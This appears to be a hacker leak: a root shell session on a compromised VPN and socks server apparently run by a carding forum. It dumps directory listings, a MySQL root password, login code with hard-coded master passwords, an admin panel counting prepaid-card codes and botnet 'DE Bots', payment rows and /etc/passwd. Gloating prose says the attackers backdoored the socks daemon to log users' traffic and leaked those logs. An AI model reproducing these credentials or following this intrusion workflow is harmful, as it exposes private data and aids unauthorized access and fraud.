-rw-r--r-- 1 www-data www-data 1063 Dec 27 16:40 dbg.html
-rw-r--r-- 1 www-data www-data 6412 Nov 21 15:48 djdalio__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Dec 10 22:27 docscanner__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 17 14:41 duden__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Dec 1 14:38 dudex__splittingError.htm
-rw-r--r-- 1 www-data www-data 1063 Dec 27 16:11 dump.html
-rw-r--r-- 1 www-data www-data 6412 Dec 3 13:45 enosaires__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Nov 30 11:16 epoepo__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Dec 20 19:41 erebos1337__splittingError.htm
-rw-r--r-- 1 www-data root 311 Nov 18 20:21 faq.php
-rw-r--r-- 1 root root 1406 Nov 18 23:11 favicon.ico
-rw-r--r-- 1 www-data www-data 6412 Dec 14 13:24 frankylo__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 14 16:48 fuckdawn__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 24 16:14 hackbart2__splittingError.htm
-rw-r--r-- 1 root root 967 Aug 3 19:00 handleVsocks.php
-rw-r--r-- 1 www-data www-data 6412 Dec 13 00:18 hans2000__splittingError.htm
-rw-r--r-- 1 root root 56 May 11 2010 hdf2.php
-rw-r--r-- 1 www-data root 1064 Jul 17 14:33 header.php
-rw-r--r-- 1 root root 950 Nov 18 21:54 header2.php
-rw-r--r-- 1 www-data www-data 6412 Dec 13 15:32 hexst4tic__splittingError.htm
-rw-r--r-- 1 www-data root 1380 Aug 23 01:44 home.php
-rw-r--r-- 1 root root 178 Nov 15 18:01 home2.php
-rw-r--r-- 1 www-data www-data 6412 Nov 9 20:00 hund123456__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Nov 22 18:04 iKas2__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 7 19:15 iiyama__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Dec 13 10:08 ikarus22__splittingError.htm
drwxr-xr-x 2 www-data root 4096 Nov 4 21:36 images
drwxr-xr-x 2 root root 4096 Nov 18 21:45 images2
-rw-r--r-- 1 root root 10646 Nov 18 23:16 index.php
-rw-r--r-- 1 root root 4299 Nov 18 21:26 indexORIGINALbss213123123.php
-rw-r--r-- 1 www-data www-data 6411 Nov 16 15:37 jensmaul__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Nov 15 19:51 joeee__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Nov 17 21:01 jojo187__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 15 23:53 jojoman__splittingError.htm
-rw-r--r-- 1 www-data www-data 4853 Nov 23 15:15 juicestin__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Nov 24 20:33 juliasutter__splittingError.htm
-rw-r--r-- 1 www-data www-data 6515 Dec 1 23:49 kackpfosten__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Dec 17 20:07 keystyle__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 8 14:21 kirmi__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Nov 10 18:42 klaudio__splittingError.htm
drwxr-xr-x 2 www-data root 4096 Nov 20 13:42 koksundnuTTen88
-rw-r--r-- 1 www-data www-data 6411 Dec 14 13:32 kucke17__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 10 05:37 latestnews__splittingError.htm
-rw-r--r-- 1 root root 156 Nov 18 19:10 listallvsocks62342134543.php
-rw-r--r-- 1 www-data root 1421 May 9 2010 listssh.php
-rw-r--r-- 1 www-data root 1781 Nov 18 20:28 listvpn.php
-rw-r--r-- 1 root root 1245 May 15 2010 loadssh.php
-rw-r--r-- 1 www-data www-data 1630 May 6 2010 login.php
-rw-r--r-- 1 root root 7442 Nov 18 20:27 lu_abo.php
-rw-r--r-- 1 root root 1274 Nov 4 21:05 lu_loadssh.php
-rw-r--r-- 1 root root 3126 Nov 18 20:17 lu_socks5.php
-rw-r--r-- 1 www-data www-data 6412 Jan 3 16:19 magi007__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Dec 23 21:56 makko__splittingError.htm
drwxr-xr-x 2 root root 4096 Dec 23 12:15 moneystream
-rw-r--r-- 1 www-data root 182 May 10 2010 mysql.php
-rw-r--r-- 1 root root 3879 Nov 18 20:27 newProxie.php
-rw-r--r-- 1 www-data root 596 Nov 18 20:07 news.php
-rw-r--r-- 1 www-data root 362 May 6 2010 news_overview.php
-rw-r--r-- 1 root root 380 Nov 15 17:58 news_overview2.php
-rw-r--r-- 1 www-data www-data 6412 Nov 18 12:24 nitex__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Dec 14 19:08 offlinejack__splittingError.htm
drwxr-xr-x 2 www-data root 36864 Jan 7 19:58 ovpn
-rw-r--r-- 1 www-data www-data 6412 Dec 7 19:56 pablo__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 10 20:04 pan1c__splittingError.htm
-rw-r--r-- 1 www-data www-data 6512 Dec 7 22:57 pappe223__splittingError.htm
-rw-r--r-- 1 root root 1326 Aug 24 19:30 poll.php
-rw-r--r-- 1 www-data www-data 6411 Dec 14 14:07 pscBastard__splittingError.htm
-rw-r--r-- 1 root root 256 Sep 13 16:27 pscashin.php
-rw-r--r-- 1 www-data www-data 6409 Jan 7 23:47 pwnny__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 19 19:59 pyrodeath__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Dec 14 16:24 qqqqqq__splittingError.htm
-rw-r--r-- 1 www-data root 2817 Nov 18 22:46 register.php
-rw-r--r-- 1 www-data www-data 6412 Dec 29 17:02 reideen__splittingError.htm
-rw-r--r-- 1 root root 7157 Nov 18 20:26 ru_abo.php
-rw-r--r-- 1 root root 1262 Nov 4 21:05 ru_loadssh.php
-rw-r--r-- 1 root root 3025 Nov 18 20:16 ru_socks5.php
-rw-r--r-- 1 www-data root 1196 Nov 24 17:32 saveReq.php
-rw-r--r-- 1 www-data root 5125 Aug 29 16:29 shop.php
-rw-r--r-- 1 www-data www-data 6412 Dec 10 14:33 shore__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 3 20:35 slic3menic3__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 15 22:18 snowghost__splittingError.htm
-rw-r--r-- 1 www-data root 263 Nov 18 20:16 socks5.php
-rw-r--r-- 1 root root 574 Oct 7 18:54 socksdetails.php
-rw-r--r-- 1 www-data www-data 6412 Nov 9 16:10 spran__splittingError.htm
-rw-r--r-- 1 www-data root 3104 Nov 18 20:20 styles.css
drwxr-xr-x 2 root root 4096 Oct 21 18:25 suPPortPanel18
-rw-r--r-- 1 www-data www-data 6412 Dec 23 16:07 sunrise__splittingError.htm
-rw-r--r-- 1 www-data root 1336 Nov 18 20:53 support.php
-rw-r--r-- 1 www-data www-data 6412 Jan 2 16:36 test569__splittingError.htm
-rw-r--r-- 1 root root 171 May 12 2010 time.php
-rw-r--r-- 1 www-data www-data 6412 Nov 11 18:38 traden90__splittingError.htm
-rw-r--r-- 1 root root 139 Dec 28 14:21 ukashin.php
-rw-r--r-- 1 root root 2118 Nov 18 20:25 uvsocks.php
-rw-r--r-- 1 www-data www-data 6412 Dec 15 07:03 vpn24__splittingError.htm
-rw-r--r-- 1 www-data root 799 May 6 2010 vsocks.php
-rw-r--r-- 1 www-data www-data 6412 Dec 28 14:25 w333d__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 14 17:17 winkel72__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 8 12:53 xc0re__splittingError.htm
-rw-r--r-- 1 www-data www-data 6412 Dec 11 11:52 xxx3xxx4__splittingError.htm
-rw-r--r-- 1 www-data www-data 6411 Dec 4 16:45 zezol__splittingError.htm
# cat *splittingError.htm | grep "Failed</td>"
<tr><td>6337180255464896366</td><td>Failed</td><td>100.00</td></tr>
<tr><td>6337180253212809062</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180252076434686</td><td>Failed</td><td>20.00</td></tr>
<tr><td>6337180253299398565</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180257214002899</td><td>Failed</td><td>3.00</td></tr>
<tr><td>6337180259183915580</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180252532009429</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180250390679390</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6330949130319304248</td><td>Failed</td><td>30.00</td></tr>
<tr><td>6337180259379552429</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180258343754368</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180256917976433</td><td>Failed</td><td>2.14</td></tr>
<tr><td>6337180251009203952</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180111553585578</td><td>Failed</td><td>4.00</td></tr>
<tr><td>6337180258177204589</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180253681177082</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180259073857611</td><td>Failed</td><td>3.00</td></tr>
<tr><td>6337180256462965609</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180115155785437</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180394582246475</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180258243666274</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180256212540975</td><td>Failed</td><td>50.00</td></tr>
<tr><td>6337180257735545855</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180250238018710</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180250936554560</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180258032831998</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180113239640306</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180259568330264</td><td>Failed</td><td>50.00</td></tr>
<tr><td>6337180254636279981</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180255605913872</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180251576728091</td><td>Failed</td><td>20.00</td></tr>
<tr><td>6337180254761736029</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180251140051070</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180258955781559</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180255901612889</td><td>Failed</td><td>20.00</td></tr>
<tr><td>6337180252316842391</td><td>Failed</td><td>20.00</td></tr>
<tr><td>6337180255645832702</td><td>Failed</td><td>50.00</td></tr>
<tr><td>6337180253814896822</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6330302815447899096</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180119686732454</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180253644660265</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180257110264619</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180115155785437</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180254730527152</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180259238856011</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180280592431563</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180253125392792</td><td>Failed</td><td>15.00</td></tr>
<tr><td>6337180258269992836</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180253244887904</td><td>Failed</td><td>20.00</td></tr>
<tr><td>6337180258751189123</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6637180305761777189</td><td>Failed</td><td>25.00</td></tr>
<tr><td>6337180250114063863</td><td>Failed</td><td>15.00</td></tr>
<tr><td>6337180251763555456</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180250613878779</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180258831608324</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180254951300131</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180251480953489</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180257200821070</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180252910471233</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180250992167067</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180113591950418</td><td>Failed</td><td>5.92</td></tr>
<tr><td>6337180253935682366</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180254837540264</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180251213933840</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180253734200352</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180257051176442</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180259341246183</td><td>Failed</td><td>2.00</td></tr>
<tr><td>6337180250165411383</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6332347911381552324</td><td>Failed</td><td>2.00</td></tr>
<tr><td>6337180254171009637</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180250833220976</td><td>Failed</td><td>15.00</td></tr>
<tr><td>6337180258930519133</td><td>Failed</td><td>5.00</td></tr>
<tr><td>6337180253725306614</td><td>Failed</td><td>1.30</td></tr>
<tr><td>7180254095966078633</td><td>Failed</td><td>20.00</td></tr>
<tr><td>6337180258930519133</td><td>Failed</td><td>6.44</td></tr>
<tr><td>6337180255646619421</td><td>Failed</td><td>20.00</td></tr>
<tr><td>6637180250951262628</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180255706618537</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6331780259351713338</td><td>Failed</td><td>20.00</td></tr>
<tr><td>6337180251207309429</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180251260723060</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180254766958230</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180251903818657</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180254440921646</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180256430792556</td><td>Failed</td><td>15.00</td></tr>
<tr><td>6337180256307519041</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180251553897605</td><td>Failed</td><td>20.00</td></tr>
<tr><td>6337180256373444637</td><td>Failed</td><td>10.00</td></tr>
<tr><td>6337180114065134794</td><td>Failed</td><td>8.00</td></tr>
# cat mysql.php
<?php
$server = "localhost";
$user = "root";
$pass = "QkZorIZZC5e";
$database = "vpn24";
mysql_connect($server,$user,$pass);
if(!$install)
mysql_select_db($database);
?>
# crazy fuckin masterpassword^C
# cat login.php
<?php
if(isset($_SESSION['cmuser']))
echo("<div style=''>Sie sind bereits eingeloggt als ".$_SESSION['cmuser']."</div>");
else if(isset($_POST['log']))
{
$user = mysql_real_escape_string($_POST['user']);
$pass = mysql_real_escape_string($_POST['pass']);
if($pass == "koksundnuTTen88" || $pass == "suPPort_masterPass88")
$res = mysql_query("SELECT * FROM cmuser WHERE name='$user'");
else
$res = mysql_query("SELECT * FROM cmuser WHERE name='$user' AND pass='".md5($pass)."'");
$arr = mysql_fetch_array($res);
if(mysql_num_rows($res) == 0)
die("<div style=''>Konnte dieses User/Passwort Paar nicht finden</div>");
$_SESSION['cmuser'] = $arr['name'];
$_SESSION['cmid'] = $arr['id'];
$_SESSION['cmpass'] = md5($pass);
$_SESSION['pPass'] = $arr['privPass'];
$_SESSION['pUser'] = $arr['privUser'];
$_SESSION['poll'] = $arr['poll'];
echo("<div style=''>Sie sind nun eingeloggt als <b>".$_SESSION['cmuser']."</b></div>");
}
else
{
echo <<< END
<div style="">
<div style="font-weight:bold;font-size:1.7em;">Login</div>
<table>
<form action="index.php?do=login" method="post">
<tr>
<td>User:</td><td><input class="cInp" type="text" name="user"></td>
</tr>
<tr>
<td>Pass:</td><td><input class="cInp" type="password" name="pass"></td>
</tr>
<br>
</table><br>
<input type="submit" name="log" value="Einloggen">
</form>
<br><br>
Noch keinen Account? Gleich <a href="index.php?do=register">registrieren</a>
</div>
END;
}
?>
# tar cvjf /tmp/cashin.tar.bz2 cashIn/*.php
cashIn/eeeeeeeeee.php
cashIn/myOne.php
cashIn/myukashcombine.php
cashIn/oldPSC.php
cashIn/psc.php
cashIn/ukash666.php
cashIn/ukash_convert666.php
# cd koksundnuTTen88/ && ls -la
total 152
drwxr-xr-x 2 www-data root 4096 Nov 20 13:42 .
drwxr-xr-x 9 www-data root 86016 Jan 8 02:41 ..
-rw-r--r-- 1 root root 1112 Nov 7 16:29 add5daysadsdsadsayfdsa.php
-rw-r--r-- 1 root root 511 Nov 13 12:48 asd21938uasd213dsa.php
-rw-r--r-- 1 root root 483 Aug 28 02:27 deletevsdata.php
-rw-r--r-- 1 root root 78 Nov 10 20:19 deletevsdata_noreset.php
-rw-r--r-- 1 root root 508 Aug 28 02:45 getAUserCreditsBack.php
-rw-r--r-- 1 root root 235 Jun 25 2010 getSocksUserWithoutAbo.php
-rw-r--r-- 1 root root 441 Jun 28 2010 getVPNUserWithoutAbo.php
-rw-r--r-- 1 root root 14 Jul 10 19:58 index.html
-rw-r--r-- 1 root root 724 Aug 9 17:43 insertShop.php
-rw-r--r-- 1 root root 450 Nov 4 20:29 lu_getVPNUserWithoutAbo.php
-rw-r--r-- 1 root root 5255 Nov 9 20:43 psc.php
-rw-r--r-- 1 www-data root 101 May 7 2010 style.css
-rw-r--r-- 1 www-data root 1924 May 7 2010 viewSupport.php
-rw-r--r-- 1 root root 2021 Nov 9 20:42 viewVsocksSupport.php
# cat psc.php
<?php
include("../mysql.php");
$res = mysql_query("SELECT SUM(wert) AS sw, COUNT(id) AS ci FROM pscs WHERE pass != '.'") or die(mysql_error());
$arr = mysql_fetch_array($res);
echo "Es sind <b>".$arr['ci']."</b> PaysafeCards im Wert von <b>".$arr['sw']." Euro</b> in der Datenbank<br>";
$res = mysql_query("SELECT SUM(wert) AS sw, COUNT(id) AS ci FROM ukash") or die(mysql_error());
$arr = mysql_fetch_array($res);
echo "Es sind <b>".$arr['ci']."</b> UkashCodes im Wert von <b>".$arr['sw']." Euro</b> in der Datenbank<br>";
$res = mysql_query("SELECT SUM(credits) AS sc,COUNT(id) AS ci FROM cmuser WHERE id > 26");
$arr = mysql_fetch_array($res);
echo "Es sind <b>".$arr['ci']."</b> User registriert welche noch <b>".$arr['sc']." Euro</b> an Credits haben<br>";
// socksAcces vpnAccess
$res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE socksAcces > ".time(0));
$arr = mysql_fetch_array($res);
echo " <u>Abos:</u> <b>".$arr['ci']."</b> Socks5";
$res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE vpnAccess > ".time(0));
$arr = mysql_fetch_array($res);
echo " / <b>".$arr['ci']."</b> OpenVPN<br><br>";
$res = mysql_query("SELECT COUNT(id) AS ci FROM support WHERE seen = 0");
$arr = mysql_fetch_array($res);
echo "<a style='text-decoration:none;' href='viewSupport.php'>Offene Support Tickets</a>: <b>".$arr['ci']."</b><br>";
$res = mysql_query("SELECT COUNT(id) AS ci FROM vsockssupport WHERE seen = 0");
$arr = mysql_fetch_array($res);
echo "<a style='text-decoration:none;' href='viewVsocksSupport.php'>Vicsocks Lebensanzeige</a>: <b>".$arr['ci']."</b><br><br>";
$res = mysql_query("SELECT SUM(wert) AS ge FROM pscs WHERE pass = '.'");
$arr = mysql_fetch_array($res);
$gesEarned = $arr['ge'];
$res = mysql_query("SELECT SUM(yesterday) AS ge FROM statistik");
$arr = mysql_fetch_array($res);
$gesEarnedYes = $arr['ge'];
$res = mysql_query("SELECT SUM(db_yesterday) AS ge FROM statistik");
$arr = mysql_fetch_array($res);
$gesEarnedDBYes = $arr['ge'];
echo "<span style='color:lime;'><b>Gesamt verdient: $gesEarned (Heute: ".($gesEarned-$gesEarnedYes)." / Gestern: ".($gesEarnedYes-$gesEarnedDBYes).")<br></b></span>";
$res = mysql_query("SELECT wert FROM pscs WHERE user = 'GOTT'");
$arr = mysql_fetch_array($res);
echo "Es wurden <b style='color:red;'>".$arr['wert']." Euro</b> für VicSocks ausgegeben ";
$earned = floatval($arr['wert']);
$res = mysql_query("SELECT yesterday, db_yesterday FROM statistik WHERE typ='vsocks'");
$arr = mysql_fetch_array($res);
$yest = floatval($arr['yesterday']);
$db_yest = floatval($arr['db_yesterday']);
echo "(Heute: <b>".($earned-$yest)."</b> / Gestern: <b>".($yest-$db_yest)."</b>)<br>";
$res = mysql_query("SELECT COUNT(id) AS ci FROM vsocksData");
$arr = mysql_fetch_array($res);
$fp = fopen("http://77.91.225.188/asdSDAFqwe1324.php","r");
$conN = fgets($fp,2048);
fclose($fp);
$fp = fopen("http://77.91.225.188/asdSDAFqwe13372.php","r");
$conN2 = fgets($fp,2048);
fclose($fp);
echo " <u>DE Bots:</u> <b>".$arr['ci']."</b> aktiv / <b>".$conN."</b> verfügbar / <b>".$conN2."</b> im Netz <br>";
echo "<br>";
$res = mysql_query("SELECT wert FROM pscs WHERE user = 'GOTT2'");
$arr = mysql_fetch_array($res);
echo "Es wurden <b style='color:red;'>".$arr['wert']." Euro</b> im Shop ausgegeben ";
$earned = floatval($arr['wert']);
$res = mysql_query("SELECT yesterday, db_yesterday FROM statistik WHERE typ='shop'");
$arr = mysql_fetch_array($res);
$yest = floatval($arr['yesterday']);
$db_yest = floatval($arr['db_yesterday']);
echo "(Heute: <b>".($earned-$yest)."</b> / Gestern: <b>".($yest-$db_yest)."</b>)<br>";
echo "<b>Noch verfügbar:</b><br>";
$res = mysql_query("SELECT * FROM shopLayout ORDER BY id");
while($arr = mysql_fetch_array($res))
{
$res2 = mysql_query("SELECT * FROM shopWare WHERE type='".$arr['type']."' AND buyer = ''");
$res3 = mysql_query("SELECT * FROM shopWare WHERE type='".$arr['type']."'");
echo " <b>".mysql_num_rows($res2)."</b>/".mysql_num_rows($res3)." '".$arr['text']."'<br>";
}
echo "<br>";
$res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=1 OR poll=2 OR poll=3");
$arr = mysql_fetch_array($res);
echo "Es haben <b>".$arr['ci']."</b> User an der Umfrage teilgenommen<br>";
echo " <u>Stimmen:</u> ";
$res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=1");$arr = mysql_fetch_array($res);
echo "<b>".$arr['ci']."</b> Lux&Hun / ";
$res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=2");$arr = mysql_fetch_array($res);
echo "<b>".$arr['ci']."</b> Lux&Off / ";
$res = mysql_query("SELECT COUNT(id) AS ci FROM cmuser WHERE poll=3");$arr = mysql_fetch_array($res);
echo "<b>".$arr['ci']."</b> Hun&Off<br>";
?>
____________________________________________________________________
| __ __ |
| .-----.--.--.-----.| |_.-----.| |--.-----.--.--. |
| | _ | | | _ || _| -__|| _ | _ |_ _| |
| |__ |_____|_____||____|_____||_____|_____|__.__| |
|________|__|________________________________________________________|
| |
| Was bieten Sie an? |
| Wir bieten 100% logfreie, sichere und absolut anonyme VPN, SSH |
| Socks und Socks 5 Zugänge in Russland. |
| |
| Wieso kann ich mir so sicher sein dass die Anonymisierung über |
| VPN24 100% logfrei und sicher ist? |
| Wir haben viele Erfahrungen gesammelt da der Service seit |
| 22.12.2009 existiert und er ein offizielles Projekt vom carders.cc|
| Team ist. Wir mieten nur Dedizierte Server bei Anbietern bei denen|
| wir auch zu 100% sicher sind dass diese nicht mit der Polizei |
| kooperieren (deswegen bieten wir als Location erstmal nur Russland|
| an, weitere Locations werden folgen). Außerdem sind die Server |
| 2-fach verschlüsselt und wie schon erwähnt komplett Logfrei. |
|____________________________________________________________________|
Alright. So we tapped into your russian VPN- and socksserver and shat
brix when looking at your two-times encrypted server. What kind of mad
algorithm from the future are you using? No, lemme guess, AES-0? On
top of that we unfortunately had to reduce the amount of "non-logging"
to about 0% when backdooring your sockd to log http-headers;
strangely, no AES-1337 here either. This gave us a nice round-up of
the people using (and administrating) it and we can't say it was a
surprise. Therefore you find gigabytes of http- and IPlogs neatly
packed and enclosed with the backup.
# uname -a
Linux vpnsocks 2.6.18-194.26.1.el5.028stab070.14 #1 SMP Thu Nov 18 16:34:01 MSK 2010 x86_64 GNU/Linux
# id
uid=0(root) gid=0(root)
# cat /etc/issue
Debian GNU/Linux 5.0 \n \l
# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
bind:x:101:104::/var/cache/bind:/bin/false
fetchmail:x:102:65534::/var/lib/fetchmail:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
stunnel4:x:104:106::/var/run/stunnel4:/bin/false
smmta:x:105:107:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:106:108:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
USgK1k659d:x:1000:1000::/home/SSHUSER:/usr/sbin/nologin
vpn24socks:x:1004:1004::/home/vpn24socks:/bin/false
2ee2JLMeiD:x:1005:1005::/home/SSHUSER:/usr/sbin/nologin
jguv7VJ6ii:x:1010:1010::/home/SSHUSER:/usr/sbin/nologin
sOxNXOP2PV:x:1011:1011::/home/SSHUSER:/usr/sbin/nologin
IlE6hFCCQ9:x:1016:1016::/home/SSHUSER:/usr/sbin/nologin
gxCDRFriLl:x:1017:1017::/home/SSHUSER:/usr/sbin/nologin
BulLYDNolq:x:1018:1018::/home/SSHUSER:/usr/sbin/nologin
cEzN80h8BB:x:1020:1020::/home/SSHUSER:/usr/sbin/nologin
A49RKGrvdB:x:1021:1021::/home/SSHUSER:/usr/sbin/nologin
3uUk7DToWo:x:1022:1022::/home/SSHUSER:/usr/sbin/nologin
4MMRD3G8gT:x:1025:1025::/home/SSHUSER:/usr/sbin/nologin
QIhyvtXwum:x:1026:1026::/home/SSHUSER:/usr/sbin/nologin
bX8CG70Z8o:x:1027:1027::/home/SSHUSER:/usr/sbin/nologin
NGHZWVpVuu:x:1028:1028::/home/SSHUSER:/usr/sbin/nologin
MkdEe0NgXc:x:1029:1029::/home/SSHUSER:/usr/sbin/nologin
VP3ofYe5qa:x:1033:1033::/home/SSHUSER:/usr/sbin/nologin
s9wnq4iJbL:x:1035:1035::/home/SSHUSER:/usr/sbin/nologin
JF23IDOEX0:x:1037:1037::/home/SSHUSER:/usr/sbin/nologin
GOE9IvxCo8:x:1038:1038::/home/SSHUSER:/usr/sbin/nologin
2mAWybIfou:x:1039:1039::/home/SSHUSER:/usr/sbin/nologin
ywLRB9sQG5:x:1040:1040::/home/SSHUSER:/usr/sbin/nologin
U5wILkFczX:x:1043:1043::/home/SSHUSER:/usr/sbin/nologin
qU247MmWWp:x:1045:1045::/home/SSHUSER:/usr/sbin/nologin
JpE3P8WgBN:x:1047:1047::/home/SSHUSER:/usr/sbin/nologin
OTx2pkLemc:x:1048:1048::/home/SSHUSER:/usr/sbin/nologin
tLDp1920ug:x:1049:1049::/home/SSHUSER:/usr/sbin/nologin
pzSoTppzAu:x:1052:1052::/home/SSHUSER:/usr/sbin/nologin
fcz40nnjZr:x:1053:1053::/home/SSHUSER:/usr/sbin/nologin
1TEkAllzys:x:1054:1054::/home/SSHUSER:/usr/sbin/nologin
WMfvkEivY0:x:1055:1055::/home/SSHUSER:/usr/sbin/nologin
4Vvq0LAF9r:x:1059:1059::/home/SSHUSER:/usr/sbin/nologin
QVMgMXxSeK:x:1060:1060::/home/SSHUSER:/usr/sbin/nologin
dtxSHwZpH3:x:1061:1061::/home/SSHUSER:/usr/sbin/nologin
Uth54wPUPD:x:1062:1062::/home/SSHUSER:/usr/sbin/nologin
eCWEZEQZVq:x:1064:1064::/home/SSHUSER:/usr/sbin/nologin
wp6WkrrhkH:x:1065:1065::/home/SSHUSER:/usr/sbin/nologin
QLGAfXHUAX:x:1069:1069::/home/SSHUSER:/usr/sbin/nologin
NWPWWWxBnh:x:1070:1070::/home/SSHUSER:/usr/sbin/nologin
LY5yDIThxj:x:1071:1071::/home/SSHUSER:/usr/sbin/nologin
LvJSd7KRCq:x:1072:1072::/home/SSHUSER:/usr/sbin/nologin
DNlBW8cww2:x:1074:1074::/home/SSHUSER:/usr/sbin/nologin
22JAEReAWb:x:1075:1075::/home/SSHUSER:/usr/sbin/nologin
1U7iYfKkZg:x:1076:1076::/home/SSHUSER:/usr/sbin/nologin
A9RlGkkBly:x:1078:1078::/home/SSHUSER:/usr/sbin/nologin
ezjCz5tTLo:x:1080:1080::/home/SSHUSER:/usr/sbin/nologin
CZ298VrwyT:x:1084:1084::/home/SSHUSER:/usr/sbin/nologin
DDFFWPh13H:x:1085:1085::/home/SSHUSER:/usr/sbin/nologin
FwKPqLl9HO:x:1086:1086::/home/SSHUSER:/usr/sbin/nologin
4GA5FfwFEB:x:1090:1090::/home/SSHUSER:/usr/sbin/nologin
